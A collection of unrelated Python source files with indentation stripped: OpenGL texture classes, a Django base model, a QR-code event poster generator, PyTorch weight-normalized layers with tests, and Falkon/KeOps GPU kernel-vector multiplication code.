glBindFramebuffer(GL_FRAMEBUFFER, fb)
data = []
for layer in range(self.depth):
if GL_TEXTURE_2D == self.target:
glFramebufferTexture2D(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_TEXTURE_2D, self.buffer, level)
elif GL_TEXTURE_3D == self.target:
glFramebufferTexture3D(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_TEXTURE_3D, self.buffer, level, layer)
elif GL_TEXTURE_2D_ARRAY == self.target:
glFramebufferTextureLayer(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, self.buffer, level, layer)
glReadBuffer(GL_COLOR_ATTACHMENT0)
width, height = self.get_mipmap_size(level)
pixels = glReadPixels(0, 0, width, height, self.texture_format, self.data_type)
# convert to numpy array
if type(pixels) is bytes:
pixels = np.fromstring(pixels, dtype=dtype)
data.append(pixels)
data = np.array(data, dtype=dtype)
glBindTexture(self.target, 0)
glBindFramebuffer(GL_FRAMEBUFFER, 0)
glDeleteFramebuffers(1, [fb, ])
return data
def get_mipmap_count(self):
factor = max(max(self.width, self.height), self.depth)
return math.floor(math.log2(factor)) + 1
def generate_mipmap(self):
if self.enable_mipmap:
glBindTexture(self.target, self.buffer)
glGenerateMipmap(self.target)
else:
logger.warn('%s disable to generate mipmap.' % self.name)
def texure_wrap(self, wrap):
glTexParameteri(self.target, GL_TEXTURE_WRAP_S, wrap)
glTexParameteri(self.target, GL_TEXTURE_WRAP_T, wrap)
glTexParameteri(self.target, GL_TEXTURE_WRAP_R, wrap)
def bind_texture(self, wrap=None):
if self.buffer == -1:
logger.warn("%s texture is invalid." % self.name)
return
glBindTexture(self.target, self.buffer)
if wrap is not None:
self.texure_wrap(wrap)
def bind_image(self, image_unit, level=0, access=GL_READ_WRITE):
if self.buffer == -1:
logger.warn("%s texture is invalid." % self.name)
return
# flag : GL_READ_WRITE, GL_WRITE_ONLY, GL_READ_ONLY
glBindImageTexture(image_unit, self.buffer, level, GL_FALSE, 0, access, self.internal_format)
def is_attached(self):
return self.attachment
def set_attachment(self, attachment):
self.attachment = attachment
def get_attribute(self):
self.attribute.set_attribute("name", self.name)
self.attribute.set_attribute("target", self.target)
self.attribute.set_attribute("width", self.width)
self.attribute.set_attribute("height", self.height)
self.attribute.set_attribute("depth", self.depth)
self.attribute.set_attribute("image_mode", self.image_mode)
self.attribute.set_attribute("internal_format", self.internal_format)
self.attribute.set_attribute("texture_format", self.texture_format)
self.attribute.set_attribute("data_type", self.data_type)
self.attribute.set_attribute("min_filter", self.min_filter)
self.attribute.set_attribute("mag_filter", self.mag_filter)
self.attribute.set_attribute("multisample_count", self.multisample_count)
self.attribute.set_attribute("wrap", self.wrap)
self.attribute.set_attribute("wrap_s", self.wrap_s)
self.attribute.set_attribute("wrap_t", self.wrap_t)
self.attribute.set_attribute("wrap_r", self.wrap_r)
return self.attribute
def set_attribute(self, attribute_name, attribute_value, item_info_history, attribute_index):
if hasattr(self, attribute_name) and "" != attribute_value:
setattr(self, attribute_name, eval(attribute_value))
if 'wrap' in attribute_name:
glBindTexture(self.target, self.buffer)
glTexParameteri(self.target, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(self.target, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(self.target, GL_TEXTURE_WRAP_R, self.wrap_r or self.wrap)
glBindTexture(self.target, 0)
return self.attribute
class Texture2D(Texture):
target = GL_TEXTURE_2D
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
data = texture_data.get('data')
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_2D, self.buffer)
if self.use_glTexStorage:
glTexStorage2D(GL_TEXTURE_2D,
self.get_mipmap_count(),
self.internal_format,
self.width, self.height)
if data is not None:
glTexSubImage2D(GL_TEXTURE_2D,
0,
0, 0,
self.width, self.height,
self.texture_format,
self.data_type,
data)
else:
glTexImage2D(GL_TEXTURE_2D,
0,
self.internal_format,
self.width,
self.height,
0,
self.texture_format,
self.data_type,
data)
if self.enable_mipmap:
glGenerateMipmap(GL_TEXTURE_2D)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, self.min_filter)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, self.mag_filter)
if self.clear_color is not None:
glClearTexImage(self.buffer, 0, self.texture_format, self.data_type, self.clear_color)
glBindTexture(GL_TEXTURE_2D, 0)
class Texture2DArray(Texture):
target = GL_TEXTURE_2D_ARRAY
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
data = texture_data.get('data')
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_2D_ARRAY, self.buffer)
if self.use_glTexStorage:
glTexStorage3D(GL_TEXTURE_2D_ARRAY,
self.get_mipmap_count(),
self.internal_format,
self.width, self.height, self.depth)
if data is not None:
glTexSubImage3D(GL_TEXTURE_2D_ARRAY,
0,
0, 0, 0,
self.width, self.height, self.depth,
self.texture_format,
self.data_type,
data)
else:
glTexImage3D(GL_TEXTURE_2D_ARRAY,
0,
self.internal_format,
self.width,
self.height,
self.depth,
0,
self.texture_format,
self.data_type,
data)
if self.enable_mipmap:
glGenerateMipmap(GL_TEXTURE_2D_ARRAY)
glTexParameteri(GL_TEXTURE_2D_ARRAY, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(GL_TEXTURE_2D_ARRAY, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(GL_TEXTURE_2D_ARRAY, GL_TEXTURE_MIN_FILTER, self.min_filter)
glTexParameteri(GL_TEXTURE_2D_ARRAY, GL_TEXTURE_MAG_FILTER, self.mag_filter)
glBindTexture(GL_TEXTURE_2D_ARRAY, 0)
class Texture3D(Texture):
target = GL_TEXTURE_3D
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
data = texture_data.get('data')
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_3D, self.buffer)
if self.use_glTexStorage:
glTexStorage3D(GL_TEXTURE_3D,
self.get_mipmap_count(),
self.internal_format,
self.width, self.height, self.depth)
if data is not None:
glTexSubImage3D(GL_TEXTURE_3D,
0,
0, 0, 0,
self.width, self.height, self.depth,
self.texture_format,
self.data_type,
data)
else:
glTexImage3D(GL_TEXTURE_3D,
0,
self.internal_format,
self.width,
self.height,
self.depth,
0,
self.texture_format,
self.data_type,
data)
if self.enable_mipmap:
glGenerateMipmap(GL_TEXTURE_3D)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_WRAP_R, self.wrap_r or self.wrap)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_MIN_FILTER, self.min_filter)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_MAG_FILTER, self.mag_filter)
glBindTexture(GL_TEXTURE_3D, 0)
class Texture2DMultiSample(Texture):
target = GL_TEXTURE_2D_MULTISAMPLE
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
multisample_count = texture_data.get('multisample_count', 4)
self.multisample_count = multisample_count - (multisample_count % 4)
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_2D_MULTISAMPLE, self.buffer)
if self.use_glTexStorage:
glTexStorage2DMultisample(GL_TEXTURE_2D_MULTISAMPLE,
self.multisample_count,
self.internal_format,
self.width,
self.height,
GL_TRUE)
else:
glTexImage2DMultisample(GL_TEXTURE_2D_MULTISAMPLE,
self.multisample_count,
self.internal_format,
self.width,
self.height,
GL_TRUE)
glBindTexture(GL_TEXTURE_2D_MULTISAMPLE, 0)
class TextureCube(Texture):
target = GL_TEXTURE_CUBE_MAP
default_wrap = GL_REPEAT
def __init__(self, **texture_data):
self.texture_positive_x = None
self.texture_negative_x = None
self.texture_positive_y = None
self.texture_negative_y = None
self.texture_positive_z = None
self.texture_negative_z = None
Texture.__init__(self, **texture_data)
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
# If texture2d is None then create render target.
face_texture_datas = copy.copy(texture_data)
face_texture_datas.pop('name')
face_texture_datas['texture_type'] = Texture2D
self.texture_positive_x = texture_data.get('texture_positive_x', CreateTexture(name=self.name + "_right", **face_texture_datas))
self.texture_negative_x = texture_data.get('texture_negative_x', CreateTexture(name=self.name + "_left", **face_texture_datas))
self.texture_positive_y = texture_data.get('texture_positive_y', CreateTexture(name=self.name + "_top", **face_texture_datas))
self.texture_negative_y = texture_data.get('texture_negative_y', CreateTexture(name=self.name + "_bottom", **face_texture_datas))
self.texture_positive_z = texture_data.get('texture_positive_z', CreateTexture(name=self.name + "_front", **face_texture_datas))
self.texture_negative_z = texture_data.get('texture_negative_z', CreateTexture(name=self.name + "_back", **face_texture_datas))
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_CUBE_MAP, self.buffer)
if self.use_glTexStorage:
glTexStorage2D(GL_TEXTURE_CUBE_MAP, self.get_mipmap_count(), self.internal_format, self.width, self.height)
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_X, self.texture_positive_x) # Right
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_X, self.texture_negative_x) # Left
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_Y, self.texture_positive_y) # Top
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_Y, self.texture_negative_y) # Bottom
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_Z, self.texture_positive_z) # Front
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_Z, self.texture_negative_z) # Back
else:
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_X, self.texture_positive_x) # Right
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_X, self.texture_negative_x) # Left
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_Y, self.texture_positive_y) # Top
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_Y, self.texture_negative_y) # Bottom
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_Z, self.texture_positive_z) # Front
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_Z, self.texture_negative_z) # Back
if self.enable_mipmap:
glGenerateMipmap(GL_TEXTURE_CUBE_MAP)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_WRAP_R, self.wrap_r or self.wrap)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_MIN_FILTER, self.min_filter)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_MAG_FILTER, self.mag_filter)
glBindTexture(GL_TEXTURE_CUBE_MAP, 0)
@staticmethod
def createTexImage2D(target_face, texture):
glTexImage2D(target_face,
0,
texture.internal_format,
texture.width,
texture.height,
0,
texture.texture_format,
texture.data_type,
texture.get_image_data())
@staticmethod
def createTexSubImage2D(target_face, texture):
glTexSubImage2D(target_face,
0,
0, 0,
texture.width, texture.height,
texture.texture_format,
texture.data_type,
texture.get_image_data())
def delete(self):
super(TextureCube, self).delete()
self.texture_positive_x.delete()
self.texture_negative_x.delete()
self.texture_positive_y.delete()
self.texture_negative_y.delete()
self.texture_positive_z.delete()
self.texture_negative_z.delete()
def get_save_data(self, get_image_data=True):
save_data = Texture.get_save_data(self)
save_data['texture_positive_x'] = self.texture_positive_x.name
save_data['texture_negative_x'] = self.texture_negative_x.name
save_data['texture_positive_y'] = self.texture_positive_y.name
save_data['texture_negative_y'] = self.texture_negative_y.name
save_data['texture_positive_z'] = self.texture_positive_z.name
save_data['texture_negative_z'] = self.texture_negative_z.name
return save_data
def get_attribute(self):
Texture.get_attribute(self)
self.attribute.set_attribute("texture_positive_x", self.texture_positive_x.name)
self.attribute.set_attribute("texture_negative_x", self.texture_negative_x.name)
self.attribute.set_attribute("texture_positive_y", self.texture_positive_y.name)
self.attribute.set_attribute("texture_negative_y", self.texture_negative_y.name)
self.attribute.set_attribute("texture_positive_z", self.texture_positive_z.name)
self.attribute.set_attribute("texture_negative_z", self.texture_negative_z.name)
return self.attribute
|
31119
|
from django.db import models
class BaseModel(models.Model):
class Meta:
abstract = True
def reload(self):
new_self = self.__class__.objects.get(pk=self.pk)
# Clear and update the old dict.
self.__dict__.clear()
self.__dict__.update(new_self.__dict__)
|
31122
|
import io
import os
from svgutils import transform as svg_utils
import qrcode.image.svg
from cwa_qr import generate_qr_code, CwaEventDescription
class CwaPoster(object):
POSTER_PORTRAIT = 'portrait'
POSTER_LANDSCAPE = 'landscape'
TRANSLATIONS = {
POSTER_PORTRAIT: {
'file': 'poster/portrait.svg',
'x': 80,
'y': 60,
'scale': 6
},
POSTER_LANDSCAPE: {
'file': 'poster/landscape.svg',
'x': 42,
'y': 120,
'scale': 4.8
}
}
def generate_poster(event_description: CwaEventDescription, template: CwaPoster) -> svg_utils.SVGFigure:
qr = generate_qr_code(event_description)
svg = qr.make_image(image_factory=qrcode.image.svg.SvgPathImage)
svg_bytes = io.BytesIO()
svg.save(svg_bytes)
poster = svg_utils.fromfile('{}/{}'.format(
os.path.dirname(os.path.abspath(__file__)),
CwaPoster.TRANSLATIONS[template]['file']
))
overlay = svg_utils.fromstring(svg_bytes.getvalue().decode('UTF-8')).getroot()
overlay.moveto(
CwaPoster.TRANSLATIONS[template]['x'],
CwaPoster.TRANSLATIONS[template]['y'],
CwaPoster.TRANSLATIONS[template]['scale']
)
poster.append([overlay])
return poster
|
31160
|
from contextlib import contextmanager
import torch
import torch.nn.functional as F
from torch.nn import Module, Parameter
from torch.nn import init
_WN_INIT_STDV = 0.05
_SMALL = 1e-10
_INIT_ENABLED = False
def is_init_enabled():
return _INIT_ENABLED
@contextmanager
def init_mode():
global _INIT_ENABLED
assert not _INIT_ENABLED
_INIT_ENABLED = True
yield
_INIT_ENABLED = False
class DataDepInitModule(Module):
"""
Module with data-dependent initialization
"""
def __init__(self):
super().__init__()
# self._wn_initialized = False
def _init(self, *args, **kwargs):
"""
Data-dependent initialization. Will be called on the first forward()
"""
raise NotImplementedError
def _forward(self, *args, **kwargs):
"""
The standard forward pass
"""
raise NotImplementedError
def forward(self, *args, **kwargs):
"""
Calls _init (with no_grad) if not initialized.
If initialized already, calls _forward.
"""
# assert self._wn_initialized == (not _INIT_ENABLED)
if _INIT_ENABLED: # not self._wn_initialized:
# self._wn_initialized = True
with torch.no_grad(): # no gradients for the init pass
return self._init(*args, **kwargs)
return self._forward(*args, **kwargs)
class Dense(DataDepInitModule):
def __init__(self, in_features, out_features, init_scale=1.0):
super().__init__()
self.in_features, self.out_features, self.init_scale = in_features, out_features, init_scale
self.w = Parameter(torch.Tensor(out_features, in_features))
self.b = Parameter(torch.Tensor(out_features))
init.normal_(self.w, 0, _WN_INIT_STDV)
init.zeros_(self.b)
def _init(self, x):
y = self._forward(x)
m = y.mean(dim=0)
s = self.init_scale / (y.std(dim=0) + _SMALL)
assert m.shape == s.shape == self.b.shape
self.w.copy_(self.w * s[:, None])
self.b.copy_(-m * s)
return self._forward(x)
def _forward(self, x):
return F.linear(x, self.w, self.b[None, :])
class WnDense(DataDepInitModule):
def __init__(self, in_features, out_features, init_scale=1.0):
super().__init__()
self.in_features, self.out_features, self.init_scale = in_features, out_features, init_scale
self.v = Parameter(torch.Tensor(out_features, in_features))
self.g = Parameter(torch.Tensor(out_features))
self.b = Parameter(torch.Tensor(out_features))
init.normal_(self.v, 0., _WN_INIT_STDV)
init.ones_(self.g)
init.zeros_(self.b)
def _init(self, x):
# calculate unnormalized activations
y_unnormalized = self._forward(x)
# set g and b so that activations are normalized
m = y_unnormalized.mean(dim=0)
s = self.init_scale / (y_unnormalized.std(dim=0) + _SMALL)
assert m.shape == s.shape == self.g.shape == self.b.shape
self.g.data.copy_(s)
self.b.data.sub_(m * s)
# forward pass again, now normalized
return self._forward(x)
def _forward(self, x):
(bs, in_features), out_features = x.shape, self.v.shape[0]
assert in_features == self.v.shape[1]
vnorm = self.v.norm(p=2, dim=1)
assert vnorm.shape == self.g.shape == self.b.shape
y = torch.addcmul(self.b[None, :], (self.g / vnorm)[None, :], x @ self.v.t())
# the line above is equivalent to: y = self.b[None, :] + (self.g / vnorm)[None, :] * (x @ self.v.t())
assert y.shape == (bs, out_features)
return y
def extra_repr(self):
return f'in_features={self.in_dim}, out_features={self.out_features}, init_scale={self.init_scale}'
class _Nin(DataDepInitModule):
def __init__(self, in_features, out_features, wn: bool, init_scale: float):
super().__init__()
base_module = WnDense if wn else Dense
self.dense = base_module(in_features=in_features, out_features=out_features, init_scale=init_scale)
self.height, self.width = None, None
def _preprocess(self, x):
"""(b,c,h,w) -> (b*h*w,c)"""
B, C, H, W = x.shape
if self.height is None or self.width is None:
self.height, self.width = H, W
else:
assert self.height == H and self.width == W, 'nin input image shape changed!'
assert C == self.dense.in_features
return x.permute(0, 2, 3, 1).reshape(B * H * W, C)
def _postprocess(self, x):
"""(b*h*w,c) -> (b,c,h,w)"""
BHW, C = x.shape
out = x.reshape(-1, self.height, self.width, C).permute(0, 3, 1, 2)
assert out.shape[1:] == (self.dense.out_features, self.height, self.width)
return out
def _init(self, x):
return self._postprocess(self.dense._init(self._preprocess(x)))
def _forward(self, x):
return self._postprocess(self.dense._forward(self._preprocess(x)))
class Nin(_Nin):
def __init__(self, in_features, out_features, init_scale=1.0):
super().__init__(in_features=in_features, out_features=out_features, wn=False, init_scale=init_scale)
class WnNin(_Nin):
def __init__(self, in_features, out_features, init_scale=1.0):
super().__init__(in_features=in_features, out_features=out_features, wn=True, init_scale=init_scale)
class Conv2d(DataDepInitModule):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, init_scale=1.0):
super().__init__()
self.in_channels, self.out_channels, self.kernel_size, self.stride, self.padding, self.dilation, self.init_scale = \
in_channels, out_channels, kernel_size, stride, padding, dilation, init_scale
self.w = Parameter(torch.Tensor(out_channels, in_channels, self.kernel_size, self.kernel_size))
self.b = Parameter(torch.Tensor(out_channels))
init.normal_(self.w, 0, _WN_INIT_STDV)
init.zeros_(self.b)
def _init(self, x):
# x.shape == (batch, channels, h, w)
y = self._forward(x) # (batch, out_channels, h, w)
m = y.transpose(0, 1).reshape(y.shape[1], -1).mean(dim=1) # out_channels
s = self.init_scale / (y.transpose(0, 1).reshape(y.shape[1], -1).std(dim=1) + _SMALL) # out_channels
self.w.copy_(self.w * s[:, None, None, None]) # (out, in, k, k) * (ou))
self.b.copy_(-m * s)
return self._forward(x)
def _forward(self, x):
return F.conv2d(x, self.w, self.b, self.stride, self.padding, self.dilation, 1)
class WnConv2d(DataDepInitModule):
def __init__(self, in_channels, out_channels, kernel_size, padding, init_scale=1.0):
super().__init__()
self.in_channels, self.out_channels, self.kernel_size, self.padding = in_channels, out_channels, kernel_size, padding
self.init_scale = init_scale
self.v = Parameter(torch.Tensor(out_channels, in_channels, self.kernel_size, self.kernel_size))
self.g = Parameter(torch.Tensor(out_channels))
self.b = Parameter(torch.Tensor(out_channels))
init.normal_(self.v, 0., _WN_INIT_STDV)
init.ones_(self.g)
init.zeros_(self.b)
def _init(self, x):
# calculate unnormalized activations
y_bchw = self._forward(x)
assert len(y_bchw.shape) == 4 and y_bchw.shape[:2] == (x.shape[0], self.out_channels)
# set g and b so that activations are normalized
y_c = y_bchw.transpose(0, 1).reshape(self.out_channels, -1)
m = y_c.mean(dim=1)
s = self.init_scale / (y_c.std(dim=1) + _SMALL)
assert m.shape == s.shape == self.g.shape == self.b.shape
self.g.data.copy_(s)
self.b.data.sub_(m * s)
# forward pass again, now normalized
return self._forward(x)
def _forward(self, x):
vnorm = self.v.view(self.out_channels, -1).norm(p=2, dim=1)
assert vnorm.shape == self.g.shape == self.b.shape
w = self.v * (self.g / (vnorm + _SMALL)).view(self.out_channels, 1, 1, 1)
return F.conv2d(x, w, self.b, padding=self.padding)
def extra_repr(self):
return f'in_channels={self.in_dim}, out_channels={self.out_channels}, kernel_size={self.kernel_size}, padding={self.padding}, init_scale={self.init_scale}'
class LearnedNorm(DataDepInitModule):
def __init__(self, shape, init_scale=1.0):
super().__init__()
self.init_scale = init_scale
self.g = Parameter(torch.ones(*shape))
self.b = Parameter(torch.zeros(*shape))
def _init(self, x, *, inverse):
assert not inverse
assert x.shape[1:] == self.g.shape == self.b.shape
m_init = x.mean(dim=0)
scale_init = self.init_scale / (x.std(dim=0) + _SMALL)
self.g.copy_(scale_init)
self.b.copy_(-m_init * scale_init)
return self._forward(x, inverse=inverse)
def get_gain(self):
return torch.clamp(self.g, min=1e-10)
def _forward(self, x, *, inverse):
"""
inverse == False to normalize; inverse == True to unnormalize
"""
assert x.shape[1:] == self.g.shape == self.b.shape
assert x.dtype == self.g.dtype == self.b.dtype
g = self.get_gain()
if not inverse:
return x * g[None] + self.b[None]
else:
return (x - self.b[None]) / g[None]
@torch.no_grad()
def _test_data_dep_init(m, x, init_scale, verbose=True, tol=1e-8, kwargs=None):
if kwargs is None:
kwargs = {}
with init_mode():
y_init = m(x, **kwargs)
y = m(x, **kwargs)
assert (y - y_init).abs().max() < tol, 'init pass output does not match normal forward pass'
y_outputs_flat = y.transpose(0, 1).reshape(y.shape[1], -1) # assumes axis 1 is the output axis
assert y_outputs_flat.mean(dim=1).abs().max() < tol, 'means wrong after normalization'
assert (y_outputs_flat.std(dim=1) - init_scale).abs().max() < tol, 'standard deviations wrong after normalization'
if verbose:
print('ok')
def test_dense():
bs = 128
in_features = 20
out_features = 29
init_scale = 3.14159
x = torch.randn(bs, in_features, dtype=torch.float64)
for module in [Dense, WnDense]:
m = module(in_features=in_features, out_features=out_features, init_scale=init_scale).double()
_test_data_dep_init(m, x, init_scale)
assert m(x).shape == (bs, out_features)
def test_conv2d():
bs = 128
in_channels = 20
out_channels = 29
height = 9
width = 11
init_scale = 3.14159
x = torch.randn(bs, in_channels, height, width, dtype=torch.float64)
for module in [Conv2d, WnConv2d]:
m = module(in_channels=in_channels, out_channels=out_channels, kernel_size=3, padding=1,
init_scale=init_scale).double()
_test_data_dep_init(m, x, init_scale)
assert m(x).shape == (bs, out_channels, height, width)
def test_learnednorm():
bs = 128
in_features = 20
init_scale = 3.14159
x = torch.rand(bs, in_features, dtype=torch.float64)
m = LearnedNorm(shape=(in_features,), init_scale=init_scale).double()
_test_data_dep_init(m, x, init_scale, kwargs={'inverse': False})
y = m(x, inverse=False)
assert y.shape == (bs, in_features)
assert torch.allclose(m(y, inverse=True), x), 'inverse failed'
|
31271
|
import warnings
from dataclasses import dataclass
from typing import List, Optional
import torch
from falkon.utils.stream_utils import sync_current_stream
from falkon.mmv_ops.utils import _get_gpu_info, create_output_mat, _start_wait_processes
from falkon.options import FalkonOptions, BaseOptions
from falkon.utils import decide_cuda
from falkon.utils.helpers import sizeof_dtype, calc_gpu_block_sizes
from pykeops.torch import Genred
@dataclass(frozen=True)
class ArgsFmmv:
X1: torch.Tensor
X2: torch.Tensor
v: torch.Tensor
other_vars: List[torch.Tensor]
out: torch.Tensor
gpu_ram: float
backend: str
function: callable
def _keops_dtype(dtype: torch.dtype) -> str:
"""Returns a string which represents the given data type.
The string representation is necessary for KeOps which doesn't
like type objects.
"""
if dtype == torch.float64:
return 'float64'
elif dtype == torch.float32:
return 'float32'
else:
raise NotImplementedError("Data type %s not recognized." % (dtype))
def _decide_backend(opt: BaseOptions, num_dim: int) -> str:
"""Switch between CPU and GPU backend for KeOps
"""
if not decide_cuda(opt):
return 'CPU'
else:
return 'GPU_1D'
def _estimate_split(N, M, D, T, R, ds):
"""Estimate the splits along dimensions N and M for a MVM to fit in memory
The operations consist of computing the product between a kernel
matrix (from a N*D and a M*D matrix) and a 'vector' of shape M*T
This typically requires storage of the input and output matrices,
which occupies (M + N)*(D + T) memory locations plus some intermediate
buffers to perform computations.
TODO: It is not clear how much intermediate memory KeOps requires;
the only thing that is certain is that it is quadratic in D.
For now we sidestep this issue by using a smaller R than what is
actually available in GPU memory.
This function calculates the split along N and M into blocks of size n*m
so that we can compute the kernel-vector product between such blocks
and still fit in GPU memory.
Parameters
-----------
- N : int
The first dimension of the kernel matrix
- M : int
The second dimension of the kernel matrix
- D : int
The data dimensionality
- T : int
The number of output columns
- R : float
The amount of memory available (in bytes)
- ds : int
The size in bytes of each element in the data matrices
(e.g. 4 if the data is in single precision).
Returns
--------
- n : int
The block size to be used along the first dimension
- m : int
The block size along the second dimension of the kernel
matrix
Raises
-------
RuntimeError
If the available memory `R` is insufficient to store even the smallest
possible input matrices. This may happen if `D` is very large since we
do not perform any splitting along `D`.
Notes
------
We find 'good' values of M, N such that
N*(D+T) + M*(D+T) <= R/ds
"""
R = R / ds
# We have a linear equation in two variables (N, M)
slope = -1
intercept = R / (D + T)
slack_points = 10
# We try to pick a point at the edges such that only one kind of split
# is necessary
if N < intercept - 1:
M = min(M, intercept + slope * N)
elif M < intercept - 1:
N = min(N, intercept + slope * M)
else:
# All points on the slope such that N, M > 0 are possible
N = intercept - slack_points - 1
M = intercept + slope * N
if N <= 0 or M <= 0:
raise RuntimeError(
"Insufficient available GPU "
"memory (available %.2fGB)" % (R * ds / 2 ** 30))
return int(N), int(M)
def _single_gpu_method(proc_idx, queue, device_id):
a: ArgsFmmv = queue.get()
backend = a.backend
X1 = a.X1
X2 = a.X2
v = a.v
oout = a.out
other_vars = a.other_vars
fn = a.function
R = a.gpu_ram
N, D = X1.shape
M = X2.shape[0]
T = v.shape[1]
device = torch.device(f"cuda:{device_id}")
# Second round of subdivision (only if necessary due to RAM constraints)
n, m = _estimate_split(N, M, D, T, R, sizeof_dtype(X1.dtype))
other_vars_dev = [ov.to(device, copy=False) for ov in other_vars]
out_ic = oout.device.index == device_id
# Process the two rounds of splitting with a nested loop.
with torch.cuda.device(device_id):
for mi in range(0, M, m):
ml = min(m, M - mi)
if ml != M and mi > 0: # Then we must create a temporary output array
out = torch.empty_like(oout)
else:
out = oout
cX2 = X2[mi:mi + ml, :].to(device, copy=False)
cv = v[mi:mi + ml, :].to(device, copy=False)
for ni in range(0, N, n):
nl = min(n, N - ni)
cX1 = X1[ni:ni + nl, :].to(device, copy=False)
cout = out[ni: ni + nl, :].to(device, copy=False)
variables = [cX1, cX2, cv] + other_vars_dev
fn(*variables, out=cout, device_id=device_id, backend=backend)
if not out_ic:
out[ni: ni + nl, :].copy_(cout)
if ml != M and mi > 0:
oout.add_(out)
return oout
def run_keops_mmv(X1: torch.Tensor,
X2: torch.Tensor,
v: torch.Tensor,
other_vars: List[torch.Tensor],
out: Optional[torch.Tensor],
formula: str,
aliases: List[str],
axis: int,
reduction: str = 'Sum',
opt: Optional[FalkonOptions] = None) -> torch.Tensor:
if opt is None:
opt = FalkonOptions()
# Choose backend
N, D = X1.shape
T = v.shape[1]
backend = _decide_backend(opt, D)
dtype = _keops_dtype(X1.dtype)
data_devs = [X1.device, X2.device, v.device]
if any([ddev.type == 'cuda' for ddev in data_devs]) and (not backend.startswith("GPU")):
warnings.warn("KeOps backend was chosen to be CPU, but GPU input tensors found. "
"Defaulting to 'GPU_1D' backend. To force usage of the CPU backend, "
"please pass CPU tensors; to avoid this warning if the GPU backend is "
"desired, check your options (i.e. set 'use_cpu=False').")
backend = "GPU_1D"
differentiable = any(
[X1.requires_grad, X2.requires_grad, v.requires_grad] +
[o.requires_grad for o in other_vars]
)
if differentiable:
from falkon.kernels.tiling_red import TilingGenred
fn = TilingGenred(formula, aliases, reduction_op='Sum', axis=1, dtype=dtype,
dtype_acc="auto", sum_scheme="auto", opt=opt)
return fn(X1, X2, v, *other_vars, out=out, backend=backend)
# Define formula wrapper
fn = Genred(formula, aliases,
reduction_op=reduction, axis=axis,
dtype=dtype, dtype_acc=opt.keops_acc_dtype,
sum_scheme=opt.keops_sum_scheme)
comp_dev_type = backend[:3].lower().replace('gpu', 'cuda') # 'cpu' or 'cuda'
out = create_output_mat(out, data_devs, is_sparse=False, shape=(N, T), dtype=X1.dtype,
comp_dev_type=comp_dev_type, other_mat=X1, output_stride="C")
if comp_dev_type == 'cpu' and all([ddev.type == 'cpu' for ddev in data_devs]): # incore CPU
variables = [X1, X2, v] + other_vars
out = fn(*variables, out=out, backend=backend)
elif comp_dev_type == 'cuda' and all([ddev.type == 'cuda' for ddev in data_devs]): # incore CUDA
variables = [X1, X2, v] + other_vars
device = data_devs[0]
with torch.cuda.device(device):
sync_current_stream(device)
out = fn(*variables, out=out, backend=backend)
else: # Out of core
# slack is high due to imprecise memory usage estimates for keops
gpu_info = _get_gpu_info(opt, slack=opt.keops_memory_slack)
block_sizes = calc_gpu_block_sizes(gpu_info, N)
# Create queues
args = [] # Arguments passed to each subprocess
for i, g in enumerate(gpu_info):
# First round of subdivision
bwidth = block_sizes[i + 1] - block_sizes[i]
if bwidth <= 0:
continue
args.append((ArgsFmmv(
X1=X1.narrow(0, block_sizes[i], bwidth),
X2=X2,
v=v,
out=out.narrow(0, block_sizes[i], bwidth),
other_vars=other_vars,
function=fn,
backend=backend,
gpu_ram=g.usable_memory
), g.Id))
_start_wait_processes(_single_gpu_method, args)
return out
|
31273
|
import codecs
import sys
